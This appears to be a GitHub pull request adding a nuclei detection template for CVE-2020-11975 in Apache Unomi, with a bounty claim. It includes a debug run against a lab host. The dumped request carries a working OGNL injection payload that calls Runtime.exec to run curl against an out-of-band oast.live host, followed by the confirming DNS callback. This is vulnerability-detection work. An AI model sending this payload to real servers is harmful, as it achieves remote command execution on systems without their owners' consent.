PR
Create CVE-2020-11975.yaml
projectdiscovery/nuclei-templates#12678

Template / PR Information

Added CVE-2020-11975 : Apache Unomi - Expression Language Injection

Template Validation

I’ve validated this template locally?

  • YES
  • NO
└─$ nuclei -u http://192.168.1.32:8181 -t CVE-2020-11975.yaml -debug
                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.2

		projectdiscovery.io
[WRN] Found 1 templates loaded with deprecated protocol syntax, update before v3 for continued support.
[INF] Current nuclei version: v3.3.2 (outdated)
[INF] Current nuclei-templates version: v10.2.5 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 75
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.live
[INF] [CVE-2020-11975] Dumped HTTP request for http://192.168.1.32:8181/context.json
POST /context.json HTTP/1.1
Host: 192.168.1.32:8181
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15
Connection: close
Content-Length: 737
Accept: */*
Accept-Language: en
Content-Type: application/json
Accept-Encoding: gzip
{
  "personalizations":[
    {
      "id":"gender-test_anystr",
      "strategy":"matching-first",
      "strategyOptions":{
        "fallback":"var2"
      },
      "contents":[
        {
          "filters":[
            {
              "condition":{
                "parameterValues":{
                  "propertyName":"(#r=@java.lang.Runtime@getRuntime()).(#r.exec(\"curl d1v446p3hd7d1eercva0fr1a6jhfyw5jd.oast.live\"))",
                  "comparisonOperator":"equals_anystr",
                  "propertyValue":"male_anystr"
                },
                "type":"profilePropertyCondition"
              }
            }
          ]
        }
      ]
    }
  ],
  "sessionId":"test-demo-session-id"
}
[DBG] [CVE-2020-11975] Dumped HTTP response http://192.168.1.32:8181/context.json
HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Methods: OPTIONS, POST, GET
Access-Control-Allow-Origin: *
Content-Type: application/json;charset=utf-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Server: Jetty(9.3.21.v20170918)
Set-Cookie: context-profile-id=8911110f-537c-4ca9-8202-a5d15960b890;Path=/;Expires=Tue, 21-Jul-2026 13:35:25 GMT
Set-Cookie: context-profile-id=8a3e4471-6754-4dfe-b367-c846334069c0;Path=/;Expires=Tue, 21-Jul-2026 13:35:25 GMT
{"profileId":"8a3e4471-6754-4dfe-b367-c846334069c0","sessionId":"test-demo-session-id","profileProperties":null,"sessionProperties":null,"profileSegments":null,"filteringResults":null,"personalizations":{"gender-test_anystr":["var2"]},"trackedConditions":[],"anonymousBrowsing":false,"consents":{}}
[d1V446p3HD7d1EercvA0fr1A6jhfyw5jD] Received DNS interaction from 172.253.220.24 at 2025-07-21 13:35:25
------------
DNS Request
------------
;; opcode: QUERY, status: NOERROR, id: 28451
;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;d1V446p3HD7d1EercvA0fr1A6jhfyw5jD.OAsT.livE. IN A
------------
DNS Response
------------
;; opcode: QUERY, status: NOERROR, id: 28451
;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
;; QUESTION SECTION:
;d1V446p3HD7d1EercvA0fr1A6jhfyw5jD.OAsT.livE. IN A
;; ANSWER SECTION:
d1V446p3HD7d1EercvA0fr1A6jhfyw5jD.OAsT.livE. 3600 IN A 178.128.210.172
;; AUTHORITY SECTION:
d1V446p3HD7d1EercvA0fr1A6jhfyw5jD.OAsT.livE. 3600 IN NS ns1.oast.live.
d1V446p3HD7d1EercvA0fr1A6jhfyw5jD.OAsT.livE. 3600 IN NS ns2.oast.live.
;; ADDITIONAL SECTION:
ns1.oast.live. 3600 IN A 178.128.210.172
ns2.oast.live. 3600 IN A 178.128.210.172
[CVE-2020-11975:word-1] [http] [critical] http://192.168.1.32:8181/context.json

/claim #12668

Claim

Total prize pool $50
Total paid $50
Status Approved
Submitted July 21, 2025
Last updated July 21, 2025

Contributors

Sourabh Sahu

@Sourabh-Sahu

100%

Sponsors

ProjectDiscovery

@projectdiscovery

$50 paid